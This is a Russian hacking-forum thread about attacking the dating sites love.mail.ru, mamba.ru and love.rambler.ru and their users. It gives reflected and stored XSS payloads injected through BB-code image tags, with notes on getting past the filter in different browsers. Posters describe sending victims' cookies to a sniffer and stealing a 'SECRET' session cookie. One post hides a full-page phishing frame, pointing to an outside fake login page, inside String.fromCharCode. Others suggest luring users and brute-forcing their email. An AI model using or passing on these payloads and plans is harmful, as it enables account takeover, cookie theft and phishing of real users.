Все таки вопрос о взломе love.mail.ru и подобных сайтов остаеться открытым. Не думаю, что у такихъ громоздких конструкций нет больше дырок через которые их можно вы??ать.)) У кого какие мысли на это счет?
Его и не закрывали. Не думай. Если интересно ищи их. У меня есть мысль "почему столько народу задоют тупые вопросы?"
Пассивная XSS: http://love.mail.ru/anketa.phtml?oid=1234567"><script>alert(/testing_by_censored!/)</script> Можно пожалуста по подробнее! Как это использовать?
Как я понимаю. Пока еще никто не знает как там профиль можно вскрыть. И с брутом траблы. Жаль! Походу прощее узнать мыло у юзера, брутануть его, и далее через его мыло восстановить пароль профиля. )))))
То что выше - уже не пашет. Надо опять искать. А так - пока теория (не проверялось) В анкете берешь себе имя "Love_Mail_Ru_закрывается" и где-нить в описании даешь ссылку и к ней комментарий "love.mail.ru закрывается!!! Читать всем!". По ссылке - твоя страница с какой-нить билебердой, на которой нулевым фреймом (но не просто фреймом - а немного по-другому оформленным (чтобы браузер не орал что доступ отклонен)) подгружается странница с пассивной xss. Ссылка (по которой она подгружается) тоже немного другая (нам нужна отсылка кук на снифер). После чего - как народ будет заходить, ты можешь пробовать полученные куки подставлять себе... Варианта два (грю же - не проверял) - тебя или не пустят вообще, либо пустят. Если пустят - то можешь что-нить там изменить. Но, опять же, я не знаю - можно ли там что изменить без ввода пароля. Но наверняка что-нить от чужого имени сделать можно. Ну и так же надо помнить - что love.mail.ru использует сервис _http://mambo.ru/ (как и многие другие сайты знакомств), так что что найдешь там - считай нашел на многих.
Если б можно было ссылки рассылать в самой системе, было б чудно. кстати. сейчас я и попробую наверно заняться этим вопросом....
Активная В духе ныне популярного хек-юродства представляю свою скромненькую активненькую ХSS на mamba.ru . Профайл - Моя страница - закладка "Дневник" Code: [img]" style="background-image:url('//')" onerror="javascript:alert(/lo/);[/img] что будет отображено как: HTML: <img src="" style="background-image:url('//')" onerror="javascript:alert(/lo/);"> Дальше лирика. Данная XSS браузеронезависимая. Единственным ее недостатком является то, что закладка "Дневник" не доступна для всех третьих лиц на самых популярных сайтах системы мамба - love.mail.ru и love.rambler.ru . Однако закладка будет доступна вам для редактирования, даже если вы находитесь на этих сайтах, стоит только кликнуть по аналогичной ссылке: HTML: http://love.mail.ru/my/edit_home.phtml?afolder=dairy Это означает, что теоретически можно "наградить" юзера данной XSS, а потом разными непалевными способами впаривать ему ссылку на его же дневник, когда он сидит на сайтах типа love.mail.ru, и снифать его куки от почты. Но, Имхо, данный способ при доступных других менее предпочтителен. Наиболее реальным (из тех, что я рискну выложить в паблик) является переманивание юзера, сидящего на love.mail.ru на сайт мамбы и дальнейшая переадресация его на фейк страницы авторизации. При этом разумно использовать фрейм на всю страницу, чтобы оставить родительским адрес-бар: HTML: <frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0><frame src=http://nash_sait.ru/fake.html frameborder=0></frameset> Кроме того, рекоментуется кодировать все это в Char . В итоге у вас долно получиться что-то вроде этого Code: [img]" style="background-image:url('//')" onerror="document.write(String.fromCharCode(60,102,114,97,109,101,115,101,116,32,99,111,108,115,61,49,48,48,37,32,114,111,119,115,61,49,48,48,37,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,60,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,110,97,115,104,95,115,97,105,116,46,114,117,47,102,97,107,101,46,104,116,109,108,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,102,114,97,109,101,115,101,116,62));[/img] что превратится в HTML: <img src="" style="background-image:url('//')" onerror="document.write(String.fromCharCode(60,102,114,97,109,101,115,101,116,32,99,111,108,115,61,49,48,48,37,32,114,111,119,115,61,49,48,48,37,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,60,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,110,97,115,104,95,115,97,105,116,46,114,117,47,102,97,107,101,46,104,116,109,108,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,102,114,97,109,101,115,101,116,62));"> Как осуществить переманивание? Дело фантазии! Например, сказать юзеру, что у тебя в дневнике куча разной инфы и т.д. Главное - код на фейк-страницу быстро убрать, иначе все станет понятно. Куки на сайтах системы мамба привязаны к айпи. Но снифануть все же имеет смысл, поскольку можно поиметь куку "SECRET", решающую все проблемы. Мой путь к данной XSS был таков (может, кому будет интересно). Первое, что вам предложат, это вести адрес картинки. Code: [img]вставьте адрес картинки[/img] Но сделав это таким простым юзерским макаром HTML: [img]http://qwerty.ru/lo.jpg[/img] Вы не увидите в исходном коде и намека на картинку. Все отфильтруется нафиг! Небольшой опыт работы с ББ-кодами достаточен для того, чтобы понять, что фильтр хочет получить закавыченный атрибут, но его не находит. Хочешь кавычек? Их есть у меня! Code: [img]"http://qwerty.ru/lo.jpg"[/img] получаем на выходе HTML: <img src=""http://qwerty.ru/lo.jpg""> После такой глупости, сложность состояла только в том, чтобы найти мультибраузерный вариант XSS Так будет работать в IE и FF Code: [img]" onerror=alert('lo');"[/img] HTML: <img src="" onerror=alert('lo');""> потому что в Opera событие ошибки не происходит, когда aтрибут параметра src тега img пуст! А вставить туда валидную или невалидную картинку (ссылку), которую Opera будет рассматривать за ошибку, у нас не получится при всем желании! После некоторых попыток удалось найти вариант, сработавший в Opera 8.53 Code: [img]" style="background-image:url('javascript:alert(\'lo\')');[/img] HTML: <img src="" style="background-image:url('javascript:alert(\'lo\')');"> У этого кода есть 2 проблемы: во-первых, как мы знаем, javascript в url автоматически фильтруется FF, во-вторых, в последней версии Opera 9.20 это уже также реализовано (и может быть, было реализовано в более ранних). В конце концов удалось инициировать ошибку не пустым атрибутом параметра src , а невалидным юрлом в стайле. P.S. Все написанное автором данного поста является частью приснившимся ему теплой весенней ночью, а частью - случайно услышанным им в троллейбусе от неизвестных ему людей, лица которых он не видел. Автор не призывает получать несанкциронированные данные пользователей с помощью описанной информации, а высказывает лишь свое скромное мнение о возможных путях оного. Автор не несет никакой ответственности за использование данных сведений в противозаконных целях. P.P.S На 11.05.07 г. программеры mamba.ru вроде как протрезвели после праздников и убрали багу с невозможностью вставки картинок. Теперь простора для XSS еще больше прежнего. NEXT =>
love.mail.ru / love.rambler.ru active XSS Теперь все это добро тупо перекочевало и собственно на мыло.ру, а также на рамблер.ру Активная XSS на поддоменах MAIL.RU и RAMBLER.RU Моя страница - Вкладка "Дневник" - "Добавить запись" Вставляем PHP: [img]http://img.mail.ru/mail/ru/images/dumb.gif"onload="alert(document.cookie); [/img] С таким же успехом можно добавлять комментарии к записям в чужих дневниках. Нет слов... Одни эмоции...